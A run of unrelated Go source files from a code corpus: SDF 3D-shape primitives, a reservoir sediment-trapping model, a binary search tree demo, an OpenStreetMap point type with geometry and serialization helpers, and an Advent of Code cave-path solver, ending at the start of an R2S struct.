q := V2(len2(V2(pos.X, pos.Y)), pos.Z)
d1 := -pos.Z - s.H
d2 := max(dot2(q, V2(s.X, s.Y)), pos.Z)
return len2(max2(V2(d1, d2), Zero2)) + min(max(d1, d2), 0.0)
}
}
func (s SDFCone) Sphere() (Vec3, float64) {
return Zero3, sqrt(s.H*s.H + s.R*s.R)
}
func Cone(h, r float64) SDF3 {
rad := math.Atan(h / r)
return TranslateZ(h/2, SDFCone{math.Sin(rad), math.Cos(rad), h, r})
}
func TriPrism(h, w float64) SDF3 {
return TranslateZ(-h/2, RotateX(-90, Extrude(w, Triangle(
V2(0, h), V2(-w/2, 0), V2(w/2, 0),
))))
}
func Pyramid(h, w float64) SDF3 {
prism := TriPrism(h, w)
return Intersection(prism, RotateZ(90, prism))
}
type SDFRounded struct {
Radius float64
SDF3
}
func (s SDFRounded) SDF() func(Vec3) float64 {
sdf := s.SDF3.SDF()
return func(pos Vec3) float64 {
return sdf(pos) - s.Radius
}
}
func (s SDFRounded) Sphere() (Vec3, float64) {
center, radius := s.SDF3.Sphere()
return center, radius + s.Radius
}
func Round(radius float64, sdf SDF3) SDF3 {
return SDFRounded{radius, sdf}
}
type SDFHollow struct {
Thickness float64
SDF3
}
func (s SDFHollow) SDF() func(Vec3) float64 {
sdf := s.SDF3.SDF()
return func(pos Vec3) float64 {
return abs(sdf(pos)) - s.Thickness
}
}
func (s SDFHollow) Sphere() (Vec3, float64) {
center, radius := s.SDF3.Sphere()
return center, radius
}
func Hollow(thickness float64, sdf SDF3) SDF3 {
return SDFHollow{thickness, sdf}
}
type SDFElongate struct {
H Vec3
SDF3
}
func (s SDFElongate) SDF() func(Vec3) float64 {
sdf := s.SDF3.SDF()
return func(pos Vec3) float64 {
return sdf(sub3(pos, clamp3(pos, neg3(s.H), s.H)))
}
}
func (s SDFElongate) Sphere() (Vec3, float64) {
center, radius := s.SDF3.Sphere()
return center, radius + s.H.Length()
}
func Elongate(x, y, z float64, sdf SDF3) SDF3 {
return SDFElongate{Vec3{x / 2, y / 2, z / 2}, sdf}
}
type SDFRepeat struct {
Count Vec3
Offset Vec3
SDF3
}
func (s SDFRepeat) SDF() func(Vec3) float64 {
sdf := s.SDF3.SDF()
count := s.Count
offset := s.Offset
return func(p Vec3) float64 {
return sdf(sub3(p, mul3(
clamp3(
round3(
div3(p, offset),
),
neg3(count),
count,
),
offset,
)))
}
}
func (s SDFRepeat) Sphere() (Vec3, float64) {
center, radius := s.SDF3.Sphere()
x := (s.Offset.X + radius) * s.Count.X
y := (s.Offset.Y + radius) * s.Count.Y
z := (s.Offset.Z + radius) * s.Count.Z
return center, V3(x, y, z).Length()
}
func Repeat(cx, cy, cz, ox, oy, oz float64, sdf SDF3) SDF3 {
return SDFRepeat{Vec3{cx, cy, cz}, Vec3{ox, oy, oz}, sdf}
}
type SDFEllipsoid struct {
R Vec3
}
func (s SDFEllipsoid) SDF() func(Vec3) float64 {
return func(p Vec3) float64 {
r := s.R
k0 := len3(div3(p, r))
k1 := len3(div3(p, mul3(r, r)))
return k0 * (k0 - 1.0) / k1
}
}
func (s SDFEllipsoid) Sphere() (Vec3, float64) {
return Zero3, max(s.R.X, max(s.R.Y, s.R.Z)) * 2
}
func Ellipsoid(x, y, z float64) SDF3 {
return SDFEllipsoid{Vec3{x, y, z}}
} | sdf3.go | 0.714827 | 0.441131 | sdf3.go | starcoder |
package storage
import (
"math"
"github.com/flowmatters/openwater-core/data"
"github.com/flowmatters/openwater-core/util/m"
)
/* OW-SPEC
StorageParticulateTrapping:
inputs:
inflowLoad: kg.s^-1
inflow: m^3.s^-1
outflow: m^3.s^-1
storage: m^3
states:
storedMass: kg
parameters:
DeltaT: '[1,86400] Timestep, default=86400'
reservoirCapacity:
reservoirLength: 'Length (m) of reservoir from dam wall to longest impounded water at dam capacity'
subtractor: 'default=112'
multiplier: 'default=800'
lengthDischargeFactor:
lengthDischargePower:
outputs:
trappedMass: kg
outflowLoad: kg.s^-1
implementation:
function: storageParticulateTrapping
type: scalar
lang: go
outputs: params
init:
zero: true
lang: go
tags:
storage, sediment
*/
func storageParticulateTrapping(inflowMass, storageInflow, storageOutflow, storageVolume data.ND1Float64, // inputs
initialStoredMass float64,
deltaT, reservoirCapacity, reservoirLength, subtractor, multiplier, lengthDischargeFactor, lengthDischargePower float64,
trappedMass, outflowLoad data.ND1Float64) (storedMass float64) {
storedMass = initialStoredMass
n := inflowMass.Len1()
idx := []int{0}
for i := 0; i < n; i++ {
idx[0] = i
incomingMass := inflowMass.Get(idx) * deltaT
inflowRate := storageInflow.Get(idx)
damTrappingPC := 0.0
if (inflowRate > 0) && (reservoirLength > 0) {
sedimentationIndex := math.Pow(reservoirCapacity, 2.0) / (lengthDischargeFactor * reservoirLength * math.Pow(inflowRate, 2.0))
damTrappingPC = subtractor - (multiplier * math.Pow(sedimentationIndex, lengthDischargePower))
damTrappingPC = m.MinFloat64(100.0, m.MaxFloat64(0.0, damTrappingPC))
}
dailyTrappedConstituentLoad := incomingMass * damTrappingPC / 100.0
trappedMass.Set(idx, dailyTrappedConstituentLoad)
storedMass = storedMass + incomingMass - dailyTrappedConstituentLoad
concentration := storedMass / storageVolume.Get(idx) // kg/m^3
massOutRate := storageOutflow.Get(idx) * concentration
outflowLoad.Set(idx, massOutRate)
}
return
} | models/storage/sediment_trapping.go | 0.621081 | 0.430267 | sediment_trapping.go | starcoder |
package main
import (
"errors"
"fmt"
)
func main() {
t := &TreeNode{value: 8}
t.Insert(1)
t.Insert(2)
t.Insert(3)
t.Insert(4)
t.Insert(5)
t.Insert(6)
t.Insert(7)
t.Delete(5)
t.Delete(7)
t.PrintInOrder()
fmt.Println("")
fmt.Printf("min is %d\n", t.FindMin())
fmt.Printf("max is %d\n", t.FindMax())
}
// TreeNode represents a node in a binary search tree.
type TreeNode struct {
value int
left *TreeNode
right *TreeNode
}
// Insert will insert a new value into the binary search tree.
func (treeNode *TreeNode) Insert(value int) error {
if treeNode == nil {
return errors.New("tree is empty")
}
if treeNode.value == value {
return errors.New("this node value already exists")
}
if treeNode.value > value {
if treeNode.left == nil {
treeNode.left = &TreeNode{value: value}
return nil
}
return treeNode.left.Insert(value)
}
if treeNode.value < value {
if treeNode.right == nil {
treeNode.right = &TreeNode{value: value}
return nil
}
return treeNode.right.Insert(value)
}
return nil
}
// Find finds a value in the tree.
func (treeNode *TreeNode) Find(value int) (TreeNode, bool) {
if treeNode == nil {
return TreeNode{}, false
}
switch {
case value == treeNode.value:
return *treeNode, true
case value < treeNode.value:
return treeNode.left.Find(value)
default:
return treeNode.right.Find(value)
}
}
// FindMin finds and returns the smallest value in the tree.
func (treeNode *TreeNode) FindMin() int {
if treeNode.left == nil {
return treeNode.value
}
return treeNode.left.FindMin()
}
// FindMax finds and returns the largest value in the tree.
func (treeNode *TreeNode) FindMax() int {
if treeNode.right == nil {
return treeNode.value
}
return treeNode.right.FindMax()
}
// Delete removes a value from the tree.
func (treeNode *TreeNode) Delete(value int) {
treeNode.remove(value)
}
func (treeNode *TreeNode) remove(value int) *TreeNode {
if treeNode == nil {
return nil
}
if value < treeNode.value {
treeNode.left = treeNode.left.remove(value)
return treeNode
}
if value > treeNode.value {
treeNode.right = treeNode.right.remove(value)
return treeNode
}
if treeNode.left == nil && treeNode.right == nil {
treeNode = nil
return nil
}
if treeNode.left == nil {
treeNode = treeNode.right
return treeNode
}
if treeNode.right == nil {
treeNode = treeNode.left
return treeNode
}
smallestValOnRight := treeNode.right
for {
if smallestValOnRight != nil && smallestValOnRight.left != nil {
smallestValOnRight = smallestValOnRight.left
} else {
break
}
}
treeNode.value = smallestValOnRight.value
treeNode.right = treeNode.right.remove(treeNode.value)
return treeNode
}
// PrintInOrder transverses the tree and prints the values in order.
func (treeNode *TreeNode) PrintInOrder() {
if treeNode == nil {
return
}
treeNode.left.PrintInOrder()
fmt.Println(treeNode.value)
treeNode.right.PrintInOrder()
} | main.go | 0.730866 | 0.654011 | main.go | starcoder |
package iotmaker_geo_osm
import (
"bytes"
"crypto/md5"
"encoding/binary"
"errors"
"fmt"
"github.com/helmutkemper/gOsm/consts"
"github.com/helmutkemper/gOsm/utilMath"
"github.com/helmutkemper/mgo/bson"
log "github.com/helmutkemper/seelog"
"github.com/helmutkemper/zstd"
"io"
"io/ioutil"
"math"
"os"
"strconv"
)
// point struct based on osm file
type PointStt struct {
Id int64 `bson:"id"`
// Array de localização geográfica.
// [0:x:longitude,1:y:latitude]
// Este campo deve obrigatoriamente ser um array devido a indexação do MongoDB
Loc [2]float64 `bson:"loc"`
Rad [2]float64 `bson:"rad"`
Visible bool `bson:"visible"`
// Tags do Open Street Maps
// As Tags contêm _todo tipo de informação, desde como elas foram importadas, ao nome de um estabelecimento comercial,
// por exemplo.
Tag map[string]string `bson:"tag"`
// Dados do usuário
// Como o GO é fortemente tipado, eu obtive problemas em estender o struct de forma satisfatória e permitir ao usuário
// do sistema gravar seus próprios dados, por isto, este campo foi criado. Use-o a vontade.
Data map[string]string `bson:"data"`
// Node usado apenas para o parser do arquivo
GeoJSonFeature string `bson:"geoJSonFeature"`
Md5 [16]byte `bson:"md5" json:"-"`
Size int `bson:"size" json:"-"`
HasKeyValue bool `bson:"hasKeyValue" json:"-"`
}
// Return type PointStt as []PointStt to be used into gOsm-server project
func (el *PointStt) AsArray() []PointStt {
var returnLStt []PointStt = make([]PointStt, 1)
returnLStt[0] = *el
return returnLStt
}
func (el *PointStt) CopyFrom(pointABStt PointStt) {
el.Id = pointABStt.Id
el.Loc = pointABStt.Loc
el.Rad = pointABStt.Rad
el.Tag = pointABStt.Tag
el.Data = pointABStt.Data
el.Md5 = pointABStt.Md5
el.Size = pointABStt.Size
}
func (el *PointStt) GetIdAsByte() []byte {
var ret = make([]byte, 8)
binary.LittleEndian.PutUint64(ret, uint64(el.Id))
return ret
}
func (el *PointStt) MakeMD5() (error, []byte) {
var err error
var byteBSon []byte
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
return nil, byteBSon
}
func (el *PointStt) CheckMD5() error {
var err error
var byteBSon []byte
var md = el.Md5
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
for i := 0; i != 15; i += 1 {
if el.Md5[i] != md[i] {
return errors.New("data integrity error")
}
}
return nil
}
func (el *PointStt) MakeGeoJSonFeature() string {
var geoJSon GeoJSon = GeoJSon{}
geoJSon.Init()
geoJSon.AddGeoMathPoint(strconv.FormatInt(el.Id, 10), el)
el.GeoJSonFeature, _ = geoJSon.StringLastFeature()
return el.GeoJSonFeature
}
// Set latitude and longitude as degrees
func (el *PointStt) SetLatLngDegrees(latitudeAFlt, longitudeAFlt float64) error {
el.Loc = [2]float64{longitudeAFlt, latitudeAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(longitudeAFlt), utilMath.DegreesToRadians(latitudeAFlt)}
return el.checkBounds()
}
// fixme está estranho...
func (el *PointStt) SetLatLngDecimalDrees(latitudeDegreesAFlt, latitudePrimesAFlt, latitudeSecondsAFlt, longitudeDegreesAFlt, longitudePrimesAFlt, longitudeSecondsAFlt int64) {
el.Loc = [2]float64{float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0, float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0}
el.Rad = [2]float64{utilMath.DegreesToRadians(float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0), utilMath.DegreesToRadians(float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0)}
}
// fixme está estranho...
func (el *PointStt) SetLngLatDecimalDrees(longitudeDegreesAFlt, longitudePrimesAFlt, longitudeSecondsAFlt, latitudeDegreesAFlt, latitudePrimesAFlt, latitudeSecondsAFlt int64) {
el.Loc = [2]float64{float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0, float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0}
el.Rad = [2]float64{utilMath.DegreesToRadians(float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0), utilMath.DegreesToRadians(float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0)}
}
// Set longitude and latitude as degrees
func (el *PointStt) SetLngLatDegrees(longitudeAFlt, latitudeAFlt float64) error {
el.Loc = [2]float64{longitudeAFlt, latitudeAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(longitudeAFlt), utilMath.DegreesToRadians(latitudeAFlt)}
return el.checkBounds()
}
// Set angle value as degrees
func (el *PointStt) SetXYDegrees(xAFlt, yAFlt float64) error {
el.Loc = [2]float64{xAFlt, yAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(xAFlt), utilMath.DegreesToRadians(yAFlt)}
return el.checkBounds()
}
// Set latitude and longitude as radians
func (el *PointStt) SetLatLngRadians(latitudeAFlt, longitudeAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
return el.checkBounds()
}
func (el *PointStt) SetLatLngRadiansWithoutCheckingFunction(latitudeAFlt, longitudeAFlt float64) {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
}
// Set longitude and latitude as radians
func (el *PointStt) SetLngLatRadians(longitudeAFlt, latitudeAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
return el.checkBounds()
}
// Set angle value as radians
func (el *PointStt) SetXYRadians(xAFlt, yAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(xAFlt), utilMath.RadiansToDegrees(yAFlt)}
el.Rad = [2]float64{xAFlt, yAFlt}
return el.checkBounds()
}
// Get x ( longitude )
func (el *PointStt) GetXAsDegrees() float64 { return el.Loc[0] }
func (el *PointStt) GetXAsRadians() float64 { return el.Rad[0] }
// Get y ( latitude )
func (el *PointStt) GetYDegrees() float64 { return el.Loc[1] }
// Get y ( latitude )
func (el *PointStt) GetYRadians() float64 { return el.Rad[1] }
// Get angle as string
func (el *PointStt) ToRadiansString() string {
if len(el.Rad) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("(%1.5f,%1.5f)%v", el.Rad[0], el.Rad[1], consts.RADIANS)
}
// Get angle as string
func (el *PointStt) ToDegreesString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("(%1.5f,%1.5f)%v", el.Loc[0], el.Loc[1], consts.DEGREES)
}
// Get latitude and longitude
func (el *PointStt) ToDecimalDegreesString() string {
dec := math.Abs(el.Loc[0])
degLng := math.Floor(dec)
minLng := math.Floor((dec - degLng) * 60.0)
secLng := (dec - degLng - (minLng / 60.0)) * 3600.0
if el.Loc[0] < 0 {
degLng *= -1
}
dec = math.Abs(el.Loc[1])
degLat := math.Floor(dec)
minLat := math.Floor((dec - degLat) * 60.0)
secLat := (dec - degLat - (minLat / 60.0)) * 3600.0
if el.Loc[1] < 0 {
degLat *= -1
}
return fmt.Sprintf("(%v%v%v%v%2.2f%v,%v%v%v%v%2.2f%v)", degLat, consts.DEGREES, minLat, consts.MINUTES, secLat, consts.SECONDS, degLng, consts.DEGREES, minLng, consts.MINUTES, secLng, consts.SECONDS)
}
func (el *PointStt) ToGoogleMapString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("%1.5f, %1.5f [ Please, copy and past this value on google maps search ]", el.Loc[1], el.Loc[0])
}
func (el *PointStt) ToLeafletMapString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("[%1.5f, %1.5f],", el.Loc[1], el.Loc[0])
}
// Return y coordinate as latitude
func (el PointStt) GetLatitudeAsDegrees() float64 { return el.Loc[1] }
func (el PointStt) GetLatitudeAsRadians() float64 { return el.Rad[1] }
// Return x coordinate as longitude
func (el PointStt) GetLongitudeAsDegrees() float64 { return el.Loc[0] }
// Return x coordinate as longitude
func (el PointStt) GetLongitudeAsRadians() float64 { return el.Rad[0] }
func (el PointStt) checkBounds() error {
return nil
if el.GetLatitudeAsRadians() < consts.MIN_LAT || el.GetLatitudeAsRadians() > consts.MAX_LAT {
return log.Criticalf("Error: Latitude must be < [math.Pi/2 rad|+90º] and > [-math.Pi/2 rad|-90º]. Value %v\n", el.ToRadiansString())
}
if el.GetLongitudeAsRadians() < consts.MIN_LON || el.GetLongitudeAsRadians() > consts.MAX_LON {
return log.Criticalf("Error: Longitude must be < [math.Pi rad|+180º] and > [-math.Pi rad|-180º]. Value %v\n", el.ToRadiansString())
}
return nil
}
func (el PointStt) GetBoundingBox(distanceAStt DistanceStt) BoxStt {
return BoundingBox(el, distanceAStt)
}
func (el PointStt) GetDestinationPoint(distanceAStt DistanceStt, angleAStt AngleStt) PointStt {
return DestinationPoint(el, distanceAStt, angleAStt)
}
func (el PointStt) GetDirectionBetweenTwoPoints(pointBAStt PointStt) AngleStt {
return DirectionBetweenTwoPoints(el, pointBAStt)
}
func (el PointStt) GetDistanceBetweenTwoPoints(pointBAStt PointStt) DistanceStt {
return DistanceBetweenTwoPoints(el, pointBAStt)
}
func (el *PointStt) Add(pointBAStt PointStt) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]+pointBAStt.Loc[0], el.Loc[1]+pointBAStt.Loc[1])
return ret
}
func (el *PointStt) Sub(pointBAStt PointStt) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]-pointBAStt.Loc[0], el.Loc[1]-pointBAStt.Loc[1])
return ret
}
func (el *PointStt) Plus(valueAFlt64 float64) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]*valueAFlt64, el.Loc[1]*valueAFlt64)
return ret
}
func (el *PointStt) Div(valueAFlt64 float64) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]/valueAFlt64, el.Loc[1]/valueAFlt64)
return ret
}
func (el *PointStt) Equality(pointBAStt PointStt) bool {
return el.Loc[0] == pointBAStt.Loc[0] && el.Loc[1] == pointBAStt.Loc[1]
}
func (el *PointStt) DotProduct(pointBAStt PointStt) float64 {
return el.Loc[0]*pointBAStt.Loc[0] + el.Loc[1]*pointBAStt.Loc[1]
}
func (el *PointStt) DistanceSquared(pointBAStt PointStt) float64 {
return (pointBAStt.Loc[0]-el.Loc[0])*(pointBAStt.Loc[0]-el.Loc[0]) + (pointBAStt.Loc[1]-el.Loc[1])*(pointBAStt.Loc[1]-el.Loc[1])
}
func (el *PointStt) Pythagoras(pointBAStt PointStt) float64 {
return math.Sqrt(el.DistanceSquared(pointBAStt))
}
func (el *PointStt) Distance(pointAAStt, pointBAStt PointStt) float64 {
var l2 float64 = pointAAStt.DistanceSquared(pointBAStt)
if l2 == 0.0 {
return el.Pythagoras(pointAAStt) // v == w case
}
// Consider the line extending the segment, parameterized as v + t (w - v)
// We find projection of point p onto the line.
// It falls where t = [(p-v) . (w-v)] / |w-v|^2
var pA PointStt = el.Sub(pointAAStt)
var pB PointStt = pointBAStt.Sub(pointAAStt)
var t float64 = pA.DotProduct(pB) / l2
if t < 0.0 {
return el.Pythagoras(pointAAStt)
} else if t > 1.0 {
return el.Pythagoras(pointBAStt)
}
var pC PointStt = pointBAStt.Sub(pointAAStt)
pC = pC.Plus(t)
pC = pointAAStt.Add(pC)
return el.Pythagoras(pC)
}
func (el *PointStt) DecisionDistance(pointsAAStt []PointStt) float64 {
var i int
var curDistance float64
var dst float64 = el.Pythagoras(pointsAAStt[0])
for i = 1; i < len(pointsAAStt); i += 1 {
curDistance = el.Pythagoras(pointsAAStt[i])
if curDistance < dst {
dst = curDistance
}
}
return dst
}
func (el *PointStt) IsContainedInTheList(pointsAAStt []PointStt) bool {
for _, point := range pointsAAStt {
if el.Equality(point) {
return true
}
}
return false
}
func (el *PointStt) ToExternalFile(file *os.File, typeId []byte) error {
var sizeByte = make([]byte, 8)
var byteBSon []byte
var err error
err, byteBSon = el.MakeMD5()
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
byteBSon, err = zstd.CompressLevel(nil, byteBSon, zstd.DefaultCompression)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
binary.LittleEndian.PutUint64(sizeByte, uint64(len(byteBSon)))
_, err = file.Write(typeId)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
_, err = file.Write(sizeByte)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
_, err = file.Write(byteBSon)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return err
}
func (el *PointStt) ToFilePath(filePath string) error {
var byteBSon []byte
var err error
err, byteBSon = el.MakeMD5()
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
}
err = ioutil.WriteFile(filePath, byteBSon, 0644)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return err
}
func (el *PointStt) FromFilePath(filePath string) error {
var byteBSon []byte
var err error
byteBSon, err = ioutil.ReadFile(filePath)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
el.FromBSon(byteBSon)
return err
}
func (el *PointStt) RemoveFilePath(filePath string) error {
fileInfo, err := os.Stat(filePath)
if err != nil {
return err
}
if !fileInfo.IsDir() {
return errors.New("%v is a dir, not a file")
}
return os.Remove(filePath)
}
func (el *PointStt) ToBSon() (error, []byte) {
return el.MakeMD5()
}
func (el *PointStt) ToJSon() (error, []byte) {
var err error
var byteBSon []byte
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
byteBSon, err = bson.MarshalJSON(el)
return err, byteBSon
}
func (el *PointStt) ToReader() io.Reader {
err, data := el.ToBSon()
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return bytes.NewReader(data)
}
func (el *PointStt) FromBSon(in []byte) error {
return bson.Unmarshal(in, el)
}
func (el *PointStt) FromJSon(in []byte) error {
return bson.UnmarshalJSON(in, el)
}
func (el *PointStt) ToFile(file io.Writer) error {
_, err := io.Copy(file, el.ToReader())
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
return nil
}
func (el *PointStt) FromFile(file io.Reader) error {
var bytesLBty []byte
var bufferLObj *bytes.Buffer = bytes.NewBuffer(bytesLBty)
_, err := io.Copy(bufferLObj, file)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
err = el.FromBSon(bufferLObj.Bytes())
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
return nil
} | typePoint.go | 0.627723 | 0.40031 | typePoint.go | starcoder |
package advent
import (
"strings"
. "github.com/davidparks11/advent2021/internal/advent/day12"
)
var _ Problem = &theTreacheryOfWhales{}
type passagePathing struct {
dailyProblem
}
func NewPassagePathing() Problem {
return &passagePathing{
dailyProblem{
day: 12,
},
}
}
func (p *passagePathing) Solve() interface{} {
input := p.GetInputLines()
var results []int
results = append(results, p.allPaths(input))
results = append(results, p.allPathsPlusADetour(input))
return results
}
/*
With your submarine's subterranean subsystems subsisting suboptimally, the only way you're getting out of this cave anytime soon is by finding a path yourself. Not just a path - the only way to know if you've found the best path is to find all of them.
Fortunately, the sensors are still mostly working, and so you build a rough map of the remaining caves (your puzzle input). For example:
start-A
start-b
A-c
A-b
b-d
A-end
b-end
This is a list of how all of the caves are connected. You start in the cave named start, and your destination is the cave named end. An entry like b-d means that cave b is connected to cave d - that is, you can move between them.
So, the above cave system looks roughly like this:
start
/ \
c--A-----b--d
\ /
end
Your goal is to find the number of distinct paths that start at start, end at end, and don't visit small caves more than once. There are two types of caves: big caves (written in uppercase, like A) and small caves (written in lowercase, like b). It would be a waste of time to visit any small cave more than once, but big caves are large enough that it might be worth visiting them multiple times. So, all paths you find should visit small caves at most once, and can visit big caves any number of times.
Given these rules, there are 10 paths through this example cave system:
start,A,b,A,c,A,end
start,A,b,A,end
start,A,b,end
start,A,c,A,b,A,end
start,A,c,A,b,end
start,A,c,A,end
start,A,end
start,b,A,c,A,end
start,b,A,end
start,b,end
(Each line in the above list corresponds to a single path; the caves visited by that path are listed in the order they are visited and separated by commas.)
Note that in this cave system, cave d is never visited by any path: to do so, cave b would need to be visited twice (once on the way to cave d and a second time when returning from cave d), and since cave b is small, this is not allowed.
Here is a slightly larger example:
dc-end
HN-start
start-kj
dc-start
dc-HN
LN-dc
HN-end
kj-sa
kj-HN
kj-dc
The 19 paths through it are as follows:
start,HN,dc,HN,end
start,HN,dc,HN,kj,HN,end
start,HN,dc,end
start,HN,dc,kj,HN,end
start,HN,end
start,HN,kj,HN,dc,HN,end
start,HN,kj,HN,dc,end
start,HN,kj,HN,end
start,HN,kj,dc,HN,end
start,HN,kj,dc,end
start,dc,HN,end
start,dc,HN,kj,HN,end
start,dc,end
start,dc,kj,HN,end
start,kj,HN,dc,HN,end
start,kj,HN,dc,end
start,kj,HN,end
start,kj,dc,HN,end
start,kj,dc,end
Finally, this even larger example has 226 paths through it:
fs-end
he-DX
fs-he
start-DX
pj-DX
end-zg
zg-sl
zg-pj
pj-he
RW-he
fs-DX
pj-RW
zg-RW
start-pj
he-WI
zg-he
pj-fs
start-RW
How many paths through this cave system are there that visit small caves at most once?
*/
func (p *passagePathing) allPaths(input []string) int {
paths := p.parseInput(input)
return p.countPaths(paths, paths.Start, make(map[Node]int), true)
}
/*
After reviewing the available paths, you realize you might have time to visit a single small cave twice. Specifically, big caves can be visited any number of times, a single small cave can be visited at most twice, and the remaining small caves can be visited at most once. However, the caves named start and end can only be visited exactly once each: once you leave the start cave, you may not return to it, and once you reach the end cave, the path must end immediately.
Now, the 36 possible paths through the first example above are:
start,A,b,A,b,A,c,A,end
start,A,b,A,b,A,end
start,A,b,A,b,end
start,A,b,A,c,A,b,A,end
start,A,b,A,c,A,b,end
start,A,b,A,c,A,c,A,end
start,A,b,A,c,A,end
start,A,b,A,end
start,A,b,d,b,A,c,A,end
start,A,b,d,b,A,end
start,A,b,d,b,end
start,A,b,end
start,A,c,A,b,A,b,A,end
start,A,c,A,b,A,b,end
start,A,c,A,b,A,c,A,end
start,A,c,A,b,A,end
start,A,c,A,b,d,b,A,end
start,A,c,A,b,d,b,end
start,A,c,A,b,end
start,A,c,A,c,A,b,A,end
start,A,c,A,c,A,b,end
start,A,c,A,c,A,end
start,A,c,A,end
start,A,end
start,b,A,b,A,c,A,end
start,b,A,b,A,end
start,b,A,b,end
start,b,A,c,A,b,A,end
start,b,A,c,A,b,end
start,b,A,c,A,c,A,end
start,b,A,c,A,end
start,b,A,end
start,b,d,b,A,c,A,end
start,b,d,b,A,end
start,b,d,b,end
start,b,end
The slightly larger example above now has 103 paths through it, and the even larger example now has 3509 paths through it.
Given these new rules, how many paths through this cave system are there?
*/
func (p *passagePathing) allPathsPlusADetour(input []string) int {
paths := p.parseInput(input)
return p.countPaths(paths, paths.Start, make(map[Node]int), false)
}
func (p *passagePathing) countPaths(paths *Graph, start Node, visited map[Node]int, visitedTwice bool) int {
if start == paths.End {
return 1
}
if (start[0] >= 'a' && start[0] <= 'z') && visited[start] >= 1 && start != paths.Start {
if !visitedTwice {
visitedTwice = true
} else {
return 0
}
}
visited[start]++
pathCount := 0
for _, n := range paths.Edges[start] {
if n != paths.Start {
pathCount += p.countPaths(paths, n, p.copyMap(visited), visitedTwice)
}
}
return pathCount
}
func (p *passagePathing) copyMap(m map[Node]int) map[Node]int {
cp := make(map[Node]int, len(m))
for node, visited := range m {
cp[node] = visited
}
return cp
}
func (p *passagePathing) parseInput(input []string) *Graph {
paths := &Graph{
Edges: make(map[Node][]Node),
Start: "start",
End: "end",
}
for _, line := range input {
nodeStrings := strings.Split(line, "-")
left := Node(nodeStrings[0])
right := Node(nodeStrings[1])
paths.Edges[left] = append(paths.Edges[left], right)
paths.Edges[right] = append(paths.Edges[right], left)
}
return paths
} | internal/advent/day12.go | 0.641984 | 0.428592 | day12.go | starcoder |
package chm
import (
"math"
"github.com/CRAB-LAB-NTNU/PPS-BS/biooperators"
"github.com/CRAB-LAB-NTNU/PPS-BS/types"
)
// R2S struct defines the parameters needed by r2s and the methods available
type R2S struct {
